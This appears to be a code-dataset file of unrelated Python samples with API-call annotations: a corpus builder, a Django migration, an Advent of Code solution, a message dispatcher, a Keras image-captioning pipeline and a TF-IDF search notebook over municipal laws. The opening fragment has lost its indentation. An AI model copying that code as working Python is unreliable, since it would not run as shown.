with open(args.output_file, 'w+', encoding="utf-8") as f:
f.write(all_articles)
#Print some statistics
word_count = len(re.findall(r'\w+', all_articles))
print(f'Saved file: {args.output_file}')
    print(f'Total number of articles: {index + 1}')
print(f'Number of valid articles: {valid_article_count}')
print(f'Number of words: {word_count}')
def parse_args():
# Parse commandline
parser = argparse.ArgumentParser(
description="Create corpus from parliament files! Output is an UTF-8 JSON lines")
parser.add_argument('--input_file', required=True, type=str, help='Input file')
parser.add_argument('--output_file', required=True, type=str, help='Output file')
args = parser.parse_args()
return args
if __name__ == "__main__":
args = parse_args()
main(args)
|
[
"pandas.read_csv",
"re.findall",
"argparse.ArgumentParser"
] |
[((549, 611), 'pandas.read_csv', 'pd.read_csv', (['args.input_file'], {'encoding': '"""utf-8"""', 'dtype': '"""string"""'}), "(args.input_file, encoding='utf-8', dtype='string')\n", (560, 611), True, 'import pandas as pd\n'), ((1382, 1492), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Create corpus from parliament files! Output is an UTF-8 JSON lines"""'}), "(description=\n 'Create corpus from parliament files! Output is an UTF-8 JSON lines')\n", (1405, 1492), False, 'import sys, glob, os, re, argparse\n'), ((1092, 1124), 're.findall', 're.findall', (['"""\\\\w+"""', 'all_articles'], {}), "('\\\\w+', all_articles)\n", (1102, 1124), False, 'import sys, glob, os, re, argparse\n')]
|
# Generated by Django 3.2.7 on 2021-09-20 13:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('my_ip', '0004_alter_rating_table'),
]
operations = [
migrations.RenameField(
model_name='project',
old_name='image',
new_name='project_image',
),
]
|
[
"django.db.migrations.RenameField"
] |
[((225, 318), 'django.db.migrations.RenameField', 'migrations.RenameField', ([], {'model_name': '"""project"""', 'old_name': '"""image"""', 'new_name': '"""project_image"""'}), "(model_name='project', old_name='image', new_name=\n 'project_image')\n", (247, 318), False, 'from django.db import migrations\n')]
|
from aoc2019.helpers.day04 import countValidPasswordsInRange, consecutiveDigitsRegex, exactlyTwoConsecutiveDigitsRegex
from aoc2019.shared.solution import Solution
class Day4(Solution):
def part1(self):
return countValidPasswordsInRange(
152085, 670283, consecutiveDigitsRegex)
def part2(self):
return countValidPasswordsInRange(
152085, 670283, exactlyTwoConsecutiveDigitsRegex)
|
[
"aoc2019.helpers.day04.countValidPasswordsInRange"
] |
[((224, 290), 'aoc2019.helpers.day04.countValidPasswordsInRange', 'countValidPasswordsInRange', (['(152085)', '(670283)', 'consecutiveDigitsRegex'], {}), '(152085, 670283, consecutiveDigitsRegex)\n', (250, 290), False, 'from aoc2019.helpers.day04 import countValidPasswordsInRange, consecutiveDigitsRegex, exactlyTwoConsecutiveDigitsRegex\n'), ((341, 417), 'aoc2019.helpers.day04.countValidPasswordsInRange', 'countValidPasswordsInRange', (['(152085)', '(670283)', 'exactlyTwoConsecutiveDigitsRegex'], {}), '(152085, 670283, exactlyTwoConsecutiveDigitsRegex)\n', (367, 417), False, 'from aoc2019.helpers.day04 import countValidPasswordsInRange, consecutiveDigitsRegex, exactlyTwoConsecutiveDigitsRegex\n')]
|
# Load libraries
import matplotlib.pyplot as plt
import pandas as pd
import pickle
import numpy as np
import os
from keras.applications.resnet50 import ResNet50
from keras.optimizers import Adam
from keras.layers import Dense, Flatten,Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector,Concatenate
from keras.models import Sequential, Model
from keras.utils import np_utils
import random
from keras.preprocessing import image, sequence
import matplotlib.pyplot as plt
# Load data
images_dir = os.listdir("D:\\FBAi\\data\\Flickr_Data")
images_path = 'D:\\FBAi\\data\\Flickr_Data\\Images\\'
captions_path = 'D:\\FBAi\\data\\Flickr_Data\\Flickr_TextData\\Flickr8k.token.txt'
train_path = 'D:\\FBAi\\data\\Flickr_Data\\Flickr_TextData\\Flickr_8k.trainImages.txt'
val_path = 'D:\\FBAi\\data\\Flickr_Data\\Flickr_TextData\\Flickr_8k.devImages.txt'
test_path = 'D:\\FBAi\\data\\Flickr_Data\\Flickr_TextData\\Flickr_8k.testImages.txt'
captions = open(captions_path, 'r').read().split("\n")
x_train = open(train_path, 'r').read().split("\n")
x_val = open(val_path, 'r').read().split("\n")
x_test = open(test_path, 'r').read().split("\n")
# Loading captions as values and images as key in dictionary
tokens = {}
for ix in range(len(captions)-1):
temp = captions[ix].split("#")
if temp[0] in tokens:
tokens[temp[0]].append(temp[1][2:])
else:
tokens[temp[0]] = [temp[1][2:]]
# displaying an image and captions given to it
temp = captions[10].split("#")
from IPython.display import Image, display
z = Image(filename=images_path+temp[0])
display(z)
for ix in range(len(tokens[temp[0]])):
print(tokens[temp[0]][ix])
# Creating train, test and validation dataset files with header as 'image_id' and 'captions'
train_dataset = open('flickr_8k_train_dataset.txt','wb')
train_dataset.write(b"image_id\tcaptions\n")
val_dataset = open('flickr_8k_val_dataset.txt','wb')
val_dataset.write(b"image_id\tcaptions\n")
test_dataset = open('flickr_8k_test_dataset.txt','wb')
test_dataset.write(b"image_id\tcaptions\n")
# Populating the above created files for train, test and validation dataset with image ids and captions for each of these images
for img in x_train:
if img == '':
continue
for capt in tokens[img]:
caption = "<start> "+ capt + " <end>"
train_dataset.write((img+"\t"+caption+"\n").encode())
train_dataset.flush()
train_dataset.close()
for img in x_test:
if img == '':
continue
for capt in tokens[img]:
caption = "<start> "+ capt + " <end>"
test_dataset.write((img+"\t"+caption+"\n").encode())
test_dataset.flush()
test_dataset.close()
for img in x_val:
if img == '':
continue
for capt in tokens[img]:
caption = "<start> "+ capt + " <end>"
val_dataset.write((img+"\t"+caption+"\n").encode())
val_dataset.flush()
val_dataset.close()
# Loading 50 layer Residual Network Model and getting the summary of the model
from IPython.core.display import display, HTML
display(HTML("""<a href="http://ethereon.github.io/netscope/#/gist/db945b393d40bfa26006">ResNet50 Architecture</a>"""))
model = ResNet50(include_top=False,weights='imagenet',input_shape=(224,224,3),pooling='avg')
model.summary()
# Note: For more details on ResNet50 architecture you can click on hyperlink given below
# Helper function to process images
def preprocessing(img_path):
im = image.load_img(img_path, target_size=(224,224,3))
im = image.img_to_array(im)
im = np.expand_dims(im, axis=0)
return im
train_data = {}
ctr=0
for ix in x_train:
if ix == "":
continue
if ctr >= 3000:
break
ctr+=1
if ctr%1000==0:
print(ctr)
path = images_path + ix
img = preprocessing(path)
pred = model.predict(img).reshape(2048)
train_data[ix] = pred
train_data['2513260012_03d33305cf.jpg'].shape
# opening train_encoded_images.p file and dumping it's content
with open( "train_encoded_images.p", "wb" ) as pickle_f:
pickle.dump(train_data, pickle_f )
# Loading image and its corresponding caption into a dataframe and then storing values from dataframe into 'ds'
pd_dataset = pd.read_csv("flickr_8k_train_dataset.txt", delimiter='\t')
ds = pd_dataset.values
print(ds.shape)
pd_dataset.head()
# Storing all the captions from ds into a list
sentences = []
for ix in range(ds.shape[0]):
sentences.append(ds[ix, 1])
print(len(sentences))
# First 5 captions stored in sentences
sentences[:5]
# Splitting each captions stored in 'sentences' and storing them in 'words' as list of list
words = [i.split() for i in sentences]
# Creating a list of all unique words
unique = []
for i in words:
unique.extend(i)
unique = list(set(unique))
print(len(unique))
vocab_size = len(unique)
# Vectorization
word_2_indices = {val:index for index, val in enumerate(unique)}
indices_2_word = {index:val for index, val in enumerate(unique)}
word_2_indices['UNK'] = 0
word_2_indices['raining'] = 8253
indices_2_word[0] = 'UNK'
indices_2_word[8253] = 'raining'
print(word_2_indices['<start>'])
print(indices_2_word[4011])
print(word_2_indices['<end>'])
print(indices_2_word[8051])
vocab_size = len(word_2_indices.keys())
print(vocab_size)
max_len = 0
for i in sentences:
i = i.split()
if len(i) > max_len:
max_len = len(i)
print(max_len)
padded_sequences, subsequent_words = [], []
for ix in range(ds.shape[0]):
partial_seqs = []
next_words = []
text = ds[ix, 1].split()
text = [word_2_indices[i] for i in text]
for i in range(1, len(text)):
partial_seqs.append(text[:i])
next_words.append(text[i])
padded_partial_seqs = sequence.pad_sequences(partial_seqs, max_len, padding='post')
    next_words_1hot = np.zeros([len(next_words), vocab_size], dtype=bool)
#Vectorization
for i,next_word in enumerate(next_words):
next_words_1hot[i, next_word] = 1
padded_sequences.append(padded_partial_seqs)
subsequent_words.append(next_words_1hot)
padded_sequences = np.asarray(padded_sequences)
subsequent_words = np.asarray(subsequent_words)
print(padded_sequences.shape)
print(subsequent_words.shape)
print(padded_sequences[0])
for ix in range(len(padded_sequences[0])):
for iy in range(max_len):
print(indices_2_word[padded_sequences[0][ix][iy]],)
print("\n")
print(len(padded_sequences[0]))
num_of_images = 2000
captions = np.zeros([0, max_len])
next_words = np.zeros([0, vocab_size])
for ix in range(num_of_images):#img_to_padded_seqs.shape[0]):
captions = np.concatenate([captions, padded_sequences[ix]])
next_words = np.concatenate([next_words, subsequent_words[ix]])
np.save("captions.npy", captions)
np.save("next_words.npy", next_words)
print(captions.shape)
print(next_words.shape)
with open('D:\\FBAi\\data\\train_encoded_images.p', 'rb') as f:
encoded_images = pickle.load(f, encoding="bytes")
imgs = []
for ix in range(ds.shape[0]):
if ds[ix, 0].encode() in encoded_images.keys():
# print(ix, encoded_images[ds[ix, 0].encode()])
imgs.append(list(encoded_images[ds[ix, 0].encode()]))
imgs = np.asarray(imgs)
print(imgs.shape)
images = []
for ix in range(num_of_images):
for iy in range(padded_sequences[ix].shape[0]):
images.append(imgs[ix])
images = np.asarray(images)
np.save("images.npy", images)
print(images.shape)
image_names = []
for ix in range(num_of_images):
for iy in range(padded_sequences[ix].shape[0]):
image_names.append(ds[ix, 0])
image_names = np.asarray(image_names)
np.save("image_names.npy", image_names)
print(len(image_names))
#Model
captions = np.load("captions.npy")
next_words = np.load("next_words.npy")
print(captions.shape)
print(next_words.shape)
images = np.load("images.npy")
print(images.shape)
imag = np.load("image_names.npy")
print(imag.shape)
embedding_size = 128
max_len = 40
image_model = Sequential()
image_model.add(Dense(embedding_size, input_shape=(2048,), activation='relu'))
image_model.add(RepeatVector(max_len))
image_model.summary()
language_model = Sequential()
language_model.add(Embedding(input_dim=vocab_size, output_dim=embedding_size, input_length=max_len))
language_model.add(LSTM(256, return_sequences=True))
language_model.add(TimeDistributed(Dense(embedding_size)))
language_model.summary()
conca = Concatenate()([image_model.output, language_model.output])
x = LSTM(128, return_sequences=True)(conca)
x = LSTM(512, return_sequences=False)(x)
x = Dense(vocab_size)(x)
out = Activation('softmax')(x)
model = Model(inputs=[image_model.input, language_model.input], outputs = out)
model.compile(loss='categorical_crossentropy', optimizer='RMSprop', metrics=['accuracy'])
model.summary()
hist = model.fit([images, captions], next_words, batch_size=512, epochs=200)
model.save_weights("model_weights.h5")
#Predictions
def preprocessing(img_path):
im = image.load_img(img_path, target_size=(224,224,3))
im = image.img_to_array(im)
im = np.expand_dims(im, axis=0)
return im
def get_encoding(model, img):
image = preprocessing(img)
pred = model.predict(image).reshape(2048)
return pred
resnet = ResNet50(include_top=False,weights='imagenet',input_shape=(224,224,3),pooling='avg')
img = "D:\\FBAi\\data\\Flickr_Data\\Images\\1453366750_6e8cf601bf.jpg"
test_img = get_encoding(resnet, img)
def predict_captions(image):
start_word = ["<start>"]
while True:
par_caps = [word_2_indices[i] for i in start_word]
par_caps = sequence.pad_sequences([par_caps], maxlen=max_len, padding='post')
preds = model.predict([np.array([image]), np.array(par_caps)])
word_pred = indices_2_word[np.argmax(preds[0])]
start_word.append(word_pred)
if word_pred == "<end>" or len(start_word) > max_len:
break
return ' '.join(start_word[1:-1])
Argmax_Search = predict_captions(test_img)
z = Image(filename=img)
display(z)
print(Argmax_Search)
|
[
"numpy.load",
"pickle.dump",
"numpy.argmax",
"pandas.read_csv",
"keras.preprocessing.sequence.pad_sequences",
"keras.models.Model",
"IPython.core.display.HTML",
"keras.preprocessing.image.img_to_array",
"pickle.load",
"keras.preprocessing.image.load_img",
"numpy.save",
"IPython.core.display.display",
"numpy.asarray",
"keras.layers.Concatenate",
"keras.layers.RepeatVector",
"os.listdir",
"IPython.display.Image",
"numpy.concatenate",
"keras.layers.Activation",
"keras.layers.LSTM",
"numpy.zeros",
"numpy.expand_dims",
"keras.applications.resnet50.ResNet50",
"keras.layers.Dense",
"numpy.array",
"keras.layers.Embedding",
"keras.models.Sequential"
] |
[((564, 605), 'os.listdir', 'os.listdir', (['"""D:\\\\FBAi\\\\data\\\\Flickr_Data"""'], {}), "('D:\\\\FBAi\\\\data\\\\Flickr_Data')\n", (574, 605), False, 'import os\n'), ((1624, 1661), 'IPython.display.Image', 'Image', ([], {'filename': '(images_path + temp[0])'}), '(filename=images_path + temp[0])\n', (1629, 1661), False, 'from IPython.display import Image, display\n'), ((1661, 1671), 'IPython.core.display.display', 'display', (['z'], {}), '(z)\n', (1668, 1671), False, 'from IPython.core.display import display, HTML\n'), ((3323, 3416), 'keras.applications.resnet50.ResNet50', 'ResNet50', ([], {'include_top': '(False)', 'weights': '"""imagenet"""', 'input_shape': '(224, 224, 3)', 'pooling': '"""avg"""'}), "(include_top=False, weights='imagenet', input_shape=(224, 224, 3),\n pooling='avg')\n", (3331, 3416), False, 'from keras.applications.resnet50 import ResNet50\n'), ((4386, 4444), 'pandas.read_csv', 'pd.read_csv', (['"""flickr_8k_train_dataset.txt"""'], {'delimiter': '"""\t"""'}), "('flickr_8k_train_dataset.txt', delimiter='\\t')\n", (4397, 4444), True, 'import pandas as pd\n'), ((6330, 6358), 'numpy.asarray', 'np.asarray', (['padded_sequences'], {}), '(padded_sequences)\n', (6340, 6358), True, 'import numpy as np\n'), ((6379, 6407), 'numpy.asarray', 'np.asarray', (['subsequent_words'], {}), '(subsequent_words)\n', (6389, 6407), True, 'import numpy as np\n'), ((6722, 6744), 'numpy.zeros', 'np.zeros', (['[0, max_len]'], {}), '([0, max_len])\n', (6730, 6744), True, 'import numpy as np\n'), ((6759, 6784), 'numpy.zeros', 'np.zeros', (['[0, vocab_size]'], {}), '([0, vocab_size])\n', (6767, 6784), True, 'import numpy as np\n'), ((6985, 7018), 'numpy.save', 'np.save', (['"""captions.npy"""', 'captions'], {}), "('captions.npy', captions)\n", (6992, 7018), True, 'import numpy as np\n'), ((7020, 7057), 'numpy.save', 'np.save', (['"""next_words.npy"""', 'next_words'], {}), "('next_words.npy', next_words)\n", (7027, 7057), True, 'import numpy as np\n'), ((7465, 7481), 'numpy.asarray', 'np.asarray', (['imgs'], {}), '(imgs)\n', (7475, 7481), True, 'import numpy as np\n'), ((7655, 7673), 'numpy.asarray', 'np.asarray', (['images'], {}), '(images)\n', (7665, 7673), True, 'import numpy as np\n'), ((7677, 7706), 'numpy.save', 'np.save', (['"""images.npy"""', 'images'], {}), "('images.npy', images)\n", (7684, 7706), True, 'import numpy as np\n'), ((7902, 7925), 'numpy.asarray', 'np.asarray', (['image_names'], {}), '(image_names)\n', (7912, 7925), True, 'import numpy as np\n'), ((7929, 7968), 'numpy.save', 'np.save', (['"""image_names.npy"""', 'image_names'], {}), "('image_names.npy', image_names)\n", (7936, 7968), True, 'import numpy as np\n'), ((8020, 8043), 'numpy.load', 'np.load', (['"""captions.npy"""'], {}), "('captions.npy')\n", (8027, 8043), True, 'import numpy as np\n'), ((8058, 8083), 'numpy.load', 'np.load', (['"""next_words.npy"""'], {}), "('next_words.npy')\n", (8065, 8083), True, 'import numpy as np\n'), ((8144, 8165), 'numpy.load', 'np.load', (['"""images.npy"""'], {}), "('images.npy')\n", (8151, 8165), True, 'import numpy as np\n'), ((8197, 8223), 'numpy.load', 'np.load', (['"""image_names.npy"""'], {}), "('image_names.npy')\n", (8204, 8223), True, 'import numpy as np\n'), ((8304, 8316), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (8314, 8316), False, 'from keras.models import Sequential, Model\n'), ((8486, 8498), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (8496, 8498), False, 'from keras.models import Sequential, Model\n'), ((8967, 9035), 'keras.models.Model', 
'Model', ([], {'inputs': '[image_model.input, language_model.input]', 'outputs': 'out'}), '(inputs=[image_model.input, language_model.input], outputs=out)\n', (8972, 9035), False, 'from keras.models import Sequential, Model\n'), ((9600, 9693), 'keras.applications.resnet50.ResNet50', 'ResNet50', ([], {'include_top': '(False)', 'weights': '"""imagenet"""', 'input_shape': '(224, 224, 3)', 'pooling': '"""avg"""'}), "(include_top=False, weights='imagenet', input_shape=(224, 224, 3),\n pooling='avg')\n", (9608, 9693), False, 'from keras.applications.resnet50 import ResNet50\n'), ((10392, 10411), 'IPython.display.Image', 'Image', ([], {'filename': 'img'}), '(filename=img)\n', (10397, 10411), False, 'from IPython.display import Image, display\n'), ((10413, 10423), 'IPython.core.display.display', 'display', (['z'], {}), '(z)\n', (10420, 10423), False, 'from IPython.core.display import display, HTML\n'), ((3202, 3318), 'IPython.core.display.HTML', 'HTML', (['"""<a href="http://ethereon.github.io/netscope/#/gist/db945b393d40bfa26006">ResNet50 Architecture</a>"""'], {}), '(\n \'<a href="http://ethereon.github.io/netscope/#/gist/db945b393d40bfa26006">ResNet50 Architecture</a>\'\n )\n', (3206, 3318), False, 'from IPython.core.display import display, HTML\n'), ((3594, 3645), 'keras.preprocessing.image.load_img', 'image.load_img', (['img_path'], {'target_size': '(224, 224, 3)'}), '(img_path, target_size=(224, 224, 3))\n', (3608, 3645), False, 'from keras.preprocessing import image, sequence\n'), ((3654, 3676), 'keras.preprocessing.image.img_to_array', 'image.img_to_array', (['im'], {}), '(im)\n', (3672, 3676), False, 'from keras.preprocessing import image, sequence\n'), ((3687, 3713), 'numpy.expand_dims', 'np.expand_dims', (['im'], {'axis': '(0)'}), '(im, axis=0)\n', (3701, 3713), True, 'import numpy as np\n'), ((4216, 4249), 'pickle.dump', 'pickle.dump', (['train_data', 'pickle_f'], {}), '(train_data, pickle_f)\n', (4227, 4249), False, 'import pickle\n'), ((5940, 6001), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['partial_seqs', 'max_len'], {'padding': '"""post"""'}), "(partial_seqs, max_len, padding='post')\n", (5962, 6001), False, 'from keras.preprocessing import image, sequence\n'), ((6864, 6912), 'numpy.concatenate', 'np.concatenate', (['[captions, padded_sequences[ix]]'], {}), '([captions, padded_sequences[ix]])\n', (6878, 6912), True, 'import numpy as np\n'), ((6931, 6981), 'numpy.concatenate', 'np.concatenate', (['[next_words, subsequent_words[ix]]'], {}), '([next_words, subsequent_words[ix]])\n', (6945, 6981), True, 'import numpy as np\n'), ((7199, 7231), 'pickle.load', 'pickle.load', (['f'], {'encoding': '"""bytes"""'}), "(f, encoding='bytes')\n", (7210, 7231), False, 'import pickle\n'), ((8336, 8397), 'keras.layers.Dense', 'Dense', (['embedding_size'], {'input_shape': '(2048,)', 'activation': '"""relu"""'}), "(embedding_size, input_shape=(2048,), activation='relu')\n", (8341, 8397), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8416, 8437), 'keras.layers.RepeatVector', 'RepeatVector', (['max_len'], {}), '(max_len)\n', (8428, 8437), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8521, 8606), 'keras.layers.Embedding', 'Embedding', ([], {'input_dim': 'vocab_size', 'output_dim': 'embedding_size', 'input_length': 
'max_len'}), '(input_dim=vocab_size, output_dim=embedding_size, input_length=max_len\n )\n', (8530, 8606), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8623, 8655), 'keras.layers.LSTM', 'LSTM', (['(256)'], {'return_sequences': '(True)'}), '(256, return_sequences=True)\n', (8627, 8655), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8754, 8767), 'keras.layers.Concatenate', 'Concatenate', ([], {}), '()\n', (8765, 8767), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8818, 8850), 'keras.layers.LSTM', 'LSTM', (['(128)'], {'return_sequences': '(True)'}), '(128, return_sequences=True)\n', (8822, 8850), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8863, 8896), 'keras.layers.LSTM', 'LSTM', (['(512)'], {'return_sequences': '(False)'}), '(512, return_sequences=False)\n', (8867, 8896), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8905, 8922), 'keras.layers.Dense', 'Dense', (['vocab_size'], {}), '(vocab_size)\n', (8910, 8922), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((8933, 8954), 'keras.layers.Activation', 'Activation', (['"""softmax"""'], {}), "('softmax')\n", (8943, 8954), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((9324, 9375), 'keras.preprocessing.image.load_img', 'image.load_img', (['img_path'], {'target_size': '(224, 224, 3)'}), '(img_path, target_size=(224, 224, 3))\n', (9338, 9375), False, 'from keras.preprocessing import image, sequence\n'), ((9384, 9406), 'keras.preprocessing.image.img_to_array', 'image.img_to_array', (['im'], {}), '(im)\n', (9402, 9406), False, 'from keras.preprocessing import image, sequence\n'), ((9417, 9443), 'numpy.expand_dims', 'np.expand_dims', (['im'], {'axis': '(0)'}), '(im, axis=0)\n', (9431, 9443), True, 'import numpy as np\n'), ((8693, 8714), 'keras.layers.Dense', 'Dense', (['embedding_size'], {}), '(embedding_size)\n', (8698, 8714), False, 'from keras.layers import Dense, Flatten, Input, Convolution2D, Dropout, LSTM, TimeDistributed, Embedding, Bidirectional, Activation, RepeatVector, Concatenate\n'), ((9960, 10026), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['[par_caps]'], {'maxlen': 'max_len', 'padding': '"""post"""'}), "([par_caps], maxlen=max_len, padding='post')\n", (9982, 10026), False, 'from keras.preprocessing import image, sequence\n'), ((10135, 10154), 'numpy.argmax', 'np.argmax', (['preds[0]'], {}), '(preds[0])\n', (10144, 10154), True, 'import numpy as np\n'), ((10059, 10076), 'numpy.array', 'np.array', (['[image]'], {}), '([image])\n', (10067, 10076), True, 'import numpy as np\n'), ((10078, 10096), 'numpy.array', 'np.array', (['par_caps'], {}), '(par_caps)\n', (10086, 10096), True, 'import numpy as np\n')]
|
'''
File: message_dispatcher.py
Description: Message dispatch handler
Date: 29/09/2017
Author: <NAME> <<EMAIL>>
'''
from structures import Message, MessagePacket, MessageQueue
class MessageDispatcher(object):
"""Handle the dispatch of the message from the bolt server
Registers new messages for the dispatch handling based on the subscribed
topics.
"""
def __init__(self, socket_server):
"""Initialize the MessageDispatcher
Keyword Arguments:
socket_server -- A socket server object to help with the message dispatch
"""
#The general purpose message register looks like
# message_register = {message_name: [topics]}
self.message_register = {}
#Socket server
self.socket_server = socket_server
#Message structure store
self.message_store = Message()
#Initialize the Message Queue
self.message_queue = MessageQueue()
#Register a message handler with Socket server
self.socket_server.register_handler(self.__generic_handler)
def message_exists(self, message_name):
"""Check if the message exists or not
Keyword arguments:
message_name -- The name of the message
Returns:
Bool
"""
try:
self.message_store.get_message(message_name)
except KeyError:
return False
return True
def register_handler(self, handler):
"""Register a new message handler with the socket server
Keyword arguments:
handler -- Message handling object
"""
self.socket_server.register_handler(handler)
def register_message(self, message_name, message_structure, message_topics):
"""Register a new message
Keyword arguments:
message_name -- The name of the message
        message_structure -- The structure of the message
message_topics -- The topics to which the message should be broadcasted
Returns: Bool
"""
try:
self.message_store.add_message(message_name, message_structure)
except RuntimeError:
return False
self.message_register[message_name] = message_topics
return True
def unregister_message(self, message_name):
"""Unregister a provided message
Keyword arguments:
message_name -- The name of the message to be removed
"""
if message_name in self.message_register.keys():
self.message_store.remove_message(message_name)
del self.message_register[message_name]
def send_message(self, message_name, params={}):
"""Send a new message
Keyword arguments:
message_name -- The name of the message to be sent
params -- The parameters to be added to the message
Raises:
KeyError if the params provided do not match message structure
RuntimeError if the message sending fails
Returns:
Integer
"""
message_structure = self.__get_message_structure(message_name)
for key in params.keys():
if key not in message_structure.keys():
raise KeyError("Parameter mismatch in message structure and provided params")
else:
message_structure[key] = params[key]
message_packet = MessagePacket(message_structure)
try:
for topic in self.message_register[message_name]:
mid, packet = message_packet.get_packet()
self.socket_server.send_message(topic, packet)
self.message_queue.queue(mid)
return mid
except RuntimeError:
raise RuntimeError("Unable to send the message across the topics")
def __get_message_structure(self, message_name):
"""Get the message structure
Keyword arguments:
message_name -- The name of the message whose structure needs to be
retrieved
Returns:
Mixed The message structure
"""
return self.message_store.get_message(message_name)
def __generic_handler(self, message):
"""Generic message handler
        Handles incoming messages on a generic basis by marking the
        corresponding message in the queue as completed.
Keyword arguments:
message -- The incoming message object
"""
mid = message['id']
result = message['result']
self.message_queue.update_status(mid, 'Completed')
|
[
"structures.MessageQueue",
"structures.MessagePacket",
"structures.Message"
] |
[((854, 863), 'structures.Message', 'Message', ([], {}), '()\n', (861, 863), False, 'from structures import Message, MessagePacket, MessageQueue\n'), ((932, 946), 'structures.MessageQueue', 'MessageQueue', ([], {}), '()\n', (944, 946), False, 'from structures import Message, MessagePacket, MessageQueue\n'), ((3397, 3429), 'structures.MessagePacket', 'MessagePacket', (['message_structure'], {}), '(message_structure)\n', (3410, 3429), False, 'from structures import Message, MessagePacket, MessageQueue\n')]
|
#!/usr/bin/env python
# coding: utf-8
# # Buscador
#
# This notebook implements a simple search engine.
# The representation of each text is built from TF-IDF.
# The representation of the query (the search terms)
# is built from the vocabulary of the texts.
# Results are ranked by the cosine similarity
# between the query and the texts.
#
# There are several opportunities for improvement.
# Some of them are discussed throughout the notebook.
#
# The results, even for this naive search engine,
# are quite satisfactory.
# The engine is able to return laws (in this case)
# related to places or people.
# The same mechanism, however, can be used
# for any other texts, for example the Diário Oficial.
# Some example searches are:
#
# "winterianus" - returns the Municipal Law about citronella;
#
# "E<NAME>" - returns the Municipal Law granting the title of honorary citizen of Feira;
#
# "Rua Espassonavel" - returns the Municipal Law that mentions the street.
# In[ ]:
import numpy as np
import pandas as pd
from scripts.nlp import remove_portuguese_stopwords
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics.pairwise import cosine_similarity
# In[ ]:
laws = pd.read_json("leis.json")
laws.drop(["documento"], inplace=True, axis=1)
print(laws.info())
print(laws.nunique())
# In[ ]:
laws
# In[ ]:
print(laws.loc[len(laws) - 1, "texto"])
# # Text search
#
# In the _similar_laws_ notebook we saw that TF-IDF finds laws that are very similar to one another.
# Can we also find laws similar to a query?
#
# First, we build the TF-IDF representation of the laws.
# Once we have the representations,
# we clean the query text using the same cleaning method applied to the laws.
# Then we build a representation of the query using the IDF of the trained model.
# Finally, we compute the similarity of this query
# to every law in the corpus and return the closest ones.
# In[ ]:
laws["texto_limpo"] = laws["texto"].apply(remove_portuguese_stopwords)
# In[ ]:
vectorizer = CountVectorizer()
X = vectorizer.fit_transform(laws["texto_limpo"])
X
# In[ ]:
transformer = TfidfTransformer()
X_tfidf = transformer.fit_transform(X)
X_tfidf
# In[ ]:
query = ["rua espassonavel"]
query[0] = remove_portuguese_stopwords(query[0])
query = vectorizer.transform(query)
query = transformer.transform(query)
# In[ ]:
best_matches = cosine_similarity(query, X_tfidf)
best_matches_idx = np.argsort(best_matches)
for i in range(1, 5):
idx = best_matches_idx[0, -i]
print(laws.loc[idx, "texto"])
print("\n---Next Result:---\n")
# Ta-da! A simple search engine, done!
#
# There are limitations.
# Word order and composition is one of them, for example.
# Searching for a person's first name plus surname does not help much.
# It will return results where
# either of these terms happens to be more frequent.
# There is no Google-style quoting to say
# "search for this phrase as a whole".
#
# For example, if I search for Elydio,
# the first result is the law granting
# citizenship to Elydio <NAME>.
# Perfect.
# But if I search for <NAME>,
# the first result does not even contain Azevedo,
# although the name Lopes appears more than once.
#
# One way around this difficulty is
# to use bigrams or larger n-grams.
#
# ## Other options
# ### Indexing
# There are other ways to index the documents
# and to retrieve them, also simple ones.
# Another way to index, for example,
# is to build a vector for each word
# by counting its neighbouring words.
# The vector of a document would then be
# the sum of its word vectors.
# It is an interesting approach because
# it can produce interesting visualizations
# of the similarity between words.
# For example, in the Municipal Laws corpus,
# which words does EDUCAÇÃO most resemble?
# Or SAÚDE? Etc.
#
# Another option is to count n-grams - for example,
# bigrams: two adjacent words forming a single token.
# That gives a larger matrix
# and, to some extent, a notion of word order,
# which can be useful for names of people and neighbourhoods,
# as mentioned above.
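#
# A small sketch of the bigram idea (not part of the original notebook; it simply
# reuses the cleaned texts from above and switches the tokenizer to uni+bigrams):
# In[ ]:
bigram_vectorizer = CountVectorizer(ngram_range=(1, 2))
X_bigram = bigram_vectorizer.fit_transform(laws["texto_limpo"])
X_bigram_tfidf = TfidfTransformer().fit_transform(X_bigram)
print(X_bigram.shape)  # far more columns than the unigram matrix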
#
# ### Retrieval
# Another way to retrieve results is
# _locality-sensitive hashing_ (LSH).
# It splits the space with several hyperplanes, multiple times,
# and returns the results that fall in the same region as the query
# (a toy sketch is given at the end of this section).
# However,
# the corpus is not large enough to need this strategy,
# which is aimed at large corpora.
# The method above
# (computing the cosine similarity and returning the highest values)
# is fast enough to feel instantaneous.
# Higher demand on the server might
# eventually require speeding up the search,
# but for now that is not the case.
#
# There is also a [new method]
